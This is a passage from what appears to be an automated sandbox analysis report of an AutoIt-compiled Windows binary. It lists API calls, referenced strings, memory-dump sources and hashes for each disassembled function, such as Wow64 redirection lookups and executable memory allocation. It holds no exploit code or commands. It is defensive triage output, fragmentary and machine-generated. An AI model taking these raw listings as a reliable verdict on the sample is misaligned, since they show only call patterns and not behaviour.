                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • CoUninitialize.OLE32 ref: 00EDC922
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_memmove
                      • String ID: .lnk
                      • API String ID: 2683427295-24824748
                      • Opcode ID: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
                      • Instruction ID: bf73c60a0c91cda6b9079d084fd0de7097f0a9b8e6a7a752f65c1e629a3befc3
                      • Opcode Fuzzy Hash: 3d4a08cb73d1c808b6f4848c97be80e3a59cf41874d8a67346bcc55c855f3bf5
                      • Instruction Fuzzy Hash: 72A13D71104205AFD304EF54C891EABB7F8FF95304F00992DF19AA71A2DB70EA49CB52
                      APIs
                        • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                        • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00E77BB1: _memmove.LIBCMT ref: 00E77C0B
                      • __swprintf.LIBCMT ref: 00E8302D
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E82EC6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 1943609520-557222456
                      • Opcode ID: a2a6982abda716948deefb2445e2a16e5c1343202194228d49724a7071971272
                      • Instruction ID: 6c7219910231e755ca9a8b722177cb4f71425ec7ec106101b549e4807d7177c0
                      • Opcode Fuzzy Hash: a2a6982abda716948deefb2445e2a16e5c1343202194228d49724a7071971272
                      • Instruction Fuzzy Hash: 54916D722083019FCB18FF24D885CAFB7E4EF85754F00691DF499A72A1DA60EE44CB52
                      APIs
                        • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                      • CoInitialize.OLE32(00000000), ref: 00EDBC26
                      • CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDBC3F
                      • CoUninitialize.OLE32 ref: 00EDBC5C
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                      • String ID: .lnk
                      • API String ID: 2126378814-24824748
                      • Opcode ID: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
                      • Instruction ID: aafa68d7d861702f24c0f2d11d8b582045ae5743438a70407ce2b2962df2dd6e
                      • Opcode Fuzzy Hash: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
                      • Instruction Fuzzy Hash: 6FA166756043019FCB04DF14C484D6ABBE5FF88324F158999F899AB3A2DB31ED46CB92
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00E952DD
                        • Part of subcall function 00EA0340: __87except.LIBCMT ref: 00EA037B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorHandling__87except__start
                      • String ID: pow
                      • API String ID: 2905807303-2276729525
                      • Opcode ID: 3ad570f3aac681859ad0475360c1277d025d52d689ba60d8cc36807a34c8045d
                      • Instruction ID: 6e221f35f77111655701e6a549f1ac5bce261847866fb81ffc46006812d63613
                      • Opcode Fuzzy Hash: 3ad570f3aac681859ad0475360c1277d025d52d689ba60d8cc36807a34c8045d
                      • Instruction Fuzzy Hash: 8C518022E0D70587DF12B714C95137E3BD0AB0A354F20BD98F495691E9DF74ACC49B46
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID: #$+
                      • API String ID: 0-2552117581
                      • Opcode ID: 7532a75866019653925e415cf81d782defc533dfaf4e537e304fd7fc313f548a
                      • Instruction ID: 5a15b53212221c1da567b92a4ed911fc0e661ddd59de3278d889c1a5b1b0aaf8
                      • Opcode Fuzzy Hash: 7532a75866019653925e415cf81d782defc533dfaf4e537e304fd7fc313f548a
                      • Instruction Fuzzy Hash: 5A51FF765043468FCF15DF28C488AFA7BA4EF55314F945059EC92BB2A0D731AD82CB61
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove$_free
                      • String ID: Oa
                      • API String ID: 2620147621-3945284152
                      • Opcode ID: fd5d63869f224449df5228429873c8b554f0fa4e5bf788d7286f5579351c56df
                      • Instruction ID: ee66ca4714bf7b9e4326760c9643cf2e3c05d07934ea2fa907213042bbc89798
                      • Opcode Fuzzy Hash: fd5d63869f224449df5228429873c8b554f0fa4e5bf788d7286f5579351c56df
                      • Instruction Fuzzy Hash: C25178B16083419FDB24DF28C481A6BBBE5AF85704F04582DE98DA7361EB31E901CB82
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memset$_memmove
                      • String ID: ERCP
                      • API String ID: 2532777613-1384759551
                      • Opcode ID: be786112ba686ba70f2392e9bac98238b7b82677b318e7778efb620ae8905b4c
                      • Instruction ID: 9d5d73183f0ba87cfd0b35288a21d3eaa16ace3e9e09b6d8141329ef4d480e10
                      • Opcode Fuzzy Hash: be786112ba686ba70f2392e9bac98238b7b82677b318e7778efb620ae8905b4c
                      • Instruction Fuzzy Hash: 5A51C2719003099FCB24DF64C881BAEBBF4FF04318F24956EE95EEA241E7759581CB40
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EFF910,00000000,?,?,?,?), ref: 00EF7C4E
                      • GetWindowLongW.USER32 ref: 00EF7C6B
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF7C7B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: afff8c6656f8b9ace8244b72fad79a7df13c6a42d5b072e514246120851d5b18
                      • Instruction ID: abb2f93322bcae1bf9b5f4f2287c9d1848cf28dfbe86d65cd29664d98de43bde
                      • Opcode Fuzzy Hash: afff8c6656f8b9ace8244b72fad79a7df13c6a42d5b072e514246120851d5b18
                      • Instruction Fuzzy Hash: D7318031204209ABDB118E38DC41BEA77A9EF49328F245725FAB9F32E0D731E8519B50
                      APIs
                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EF76D0
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EF76E4
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF7708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: SysMonthCal32
                      • API String ID: 2326795674-1439706946
                      • Opcode ID: eea33b6a0ee09d68f70c362141ed240efe198167abc0fd05c61c7fe18c0c71a3
                      • Instruction ID: 546b7ab55a055e24a678230dacced64190c57b0ea385e3075c9bffd85b963531
                      • Opcode Fuzzy Hash: eea33b6a0ee09d68f70c362141ed240efe198167abc0fd05c61c7fe18c0c71a3
                      • Instruction Fuzzy Hash: DB21BF32500218BBDF158E64CC42FEA3BA9EF88728F111254FE55BB1D0DAB1A851DBA0
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EF6FAA
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF6FBA
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF6FDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: 56914e49e60dfad080b1650e1358a8e9253e62165dc8a20fc51a21e0eea29a3c
                      • Instruction ID: da705b0381819c3da0162b3069299258195ed94eed6cdc4412c3ad4c7ba2eb87
                      • Opcode Fuzzy Hash: 56914e49e60dfad080b1650e1358a8e9253e62165dc8a20fc51a21e0eea29a3c
                      • Instruction Fuzzy Hash: D3218032710118BFDF118F54DC85EBB3BAAEF89764F019124FA14AB190CA71AC51DBA0
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EF79E1
                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EF79F6
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EF7A03
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: 7726359b5b9a2db6e6fd705b597d9664f9b54b506776698cf5380eda7c30be39
                      • Instruction ID: 5798e3f9ef22b8c84b46e25b0399a7ccdbc858f3aac1f15ce0f4dbd10cc46afc
                      • Opcode Fuzzy Hash: 7726359b5b9a2db6e6fd705b597d9664f9b54b506776698cf5380eda7c30be39
                      • Instruction Fuzzy Hash: 8511E732244208BADF149F64CC05FEB77A9EFC9768F025519FB41B6090D671D811DB60
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74C2E), ref: 00E74CA3
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E74CB5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetNativeSystemInfo$kernel32.dll
                      • API String ID: 2574300362-192647395
                      • Opcode ID: df1e4ddfd78cfdf6a53fc85f924b31ece7094f23281346847a812e4ba1b4f36f
                      • Instruction ID: 1fef897b9b5b4d87c03fcd5709b12d73752fe70e3bd6bd16542f54f1634c2a71
                      • Opcode Fuzzy Hash: df1e4ddfd78cfdf6a53fc85f924b31ece7094f23281346847a812e4ba1b4f36f
                      • Instruction Fuzzy Hash: 4DD05E70511727CFE7309F32DE58626B6E5AF45795B21D83ED88AF6290E770D880CA50
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74CE1,?), ref: 00E74DA2
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E74DB4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-1355242751
                      • Opcode ID: ff92ad70f869a3794e0acb168ec19ef4f0e9cdb6a8a62b493b36499cbf8dcbce
                      • Instruction ID: 65a1be59fccff1ff0703d302c8dd21a1934f910c31324b45f2f80c6b06444e9c
                      • Opcode Fuzzy Hash: ff92ad70f869a3794e0acb168ec19ef4f0e9cdb6a8a62b493b36499cbf8dcbce
                      • Instruction Fuzzy Hash: EFD05E71550723CFD7309F32D858A5676E4AF05359B11D83ED9DAF6290E770D884CA50
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74D2E,?,00E74F4F,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74D6F
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E74D81
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                      • API String ID: 2574300362-3689287502
                      • Opcode ID: 311456086897f2685e65081b8ea834a2694d2f4acfb9560d623f98877d628836
                      • Instruction ID: d80003d05675f6db4100395fa3d76d619a43827b7340887126480b521e2b2d7e
                      • Opcode Fuzzy Hash: 311456086897f2685e65081b8ea834a2694d2f4acfb9560d623f98877d628836
                      • Instruction Fuzzy Hash: 2ED01770510723CFD7309F32D84862676E8AF55356B11D83AD5CAE6290E770D884CA50
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00EF12C1), ref: 00EF1080
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EF1092
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: 9e987ca15c92723c1dee231a7e950f0676af6a804c4262b3d54842a9a5766959
                      • Instruction ID: f4389fe666247f1b539c26d40836c63ded4e6e554091e97b155b86a0e0c4bed1
                      • Opcode Fuzzy Hash: 9e987ca15c92723c1dee231a7e950f0676af6a804c4262b3d54842a9a5766959
                      • Instruction Fuzzy Hash: 5DD0123051072BCFD7305F35D81852676E4AF45355B118C79E885E6290EB74D4C0C751
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EE9009,?,00EFF910), ref: 00EE9403
                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EE9415
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetModuleHandleExW$kernel32.dll
                      • API String ID: 2574300362-199464113
                      • Opcode ID: c0964bfa12c2e069b41746db68da8448797c9d94bd91cca466ae41b986b4931c
                      • Instruction ID: 5b4aa14a9ad1ac086b09d7dc0b367d259982712966174db44372efd559f2cea9
                      • Opcode Fuzzy Hash: c0964bfa12c2e069b41746db68da8448797c9d94bd91cca466ae41b986b4931c
                      • Instruction Fuzzy Hash: 5CD0C73050032BCFC7208F33D98821272E4AF00341B00C83AE492F2692E670C880CA10
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: LocalTime__swprintf
                      • String ID: %.3d$WIN_XPe
                      • API String ID: 2070861257-2409531811
                      • Opcode ID: 8270b50a99bf1297be2d2a4bb87d5450f30722743328cfb753fd8089c6af370d
                      • Instruction ID: 642a96969db95e3bfc9e6fa7a756f7fbecd2db99ef678de2015469953cf232db
                      • Opcode Fuzzy Hash: 8270b50a99bf1297be2d2a4bb87d5450f30722743328cfb753fd8089c6af370d
                      • Instruction Fuzzy Hash: 30D01271804218EACB189AA09C94CFB737CAB04321F9465D2F506B1040F6349B85EB26
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0fafd83050152f8026cd87e5864cc22e77b98b3ad7e989c0443b0db5afaead61
                      • Instruction ID: f1fd241756b4ea2a02d96e913f42d758116e4e7c965c2daa6fe04a7af5634d45
                      • Opcode Fuzzy Hash: 0fafd83050152f8026cd87e5864cc22e77b98b3ad7e989c0443b0db5afaead61
                      • Instruction Fuzzy Hash: 91C15975A04216EFCB14CF94C984EAEBBB5FF88314B11959DE886EB250D731DD82CB90
                      APIs
                      • CharLowerBuffW.USER32(?,?), ref: 00EEE3D2
                      • CharLowerBuffW.USER32(?,?), ref: 00EEE415
                        • Part of subcall function 00EEDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9
                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EEE615
                      • _memmove.LIBCMT ref: 00EEE628
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
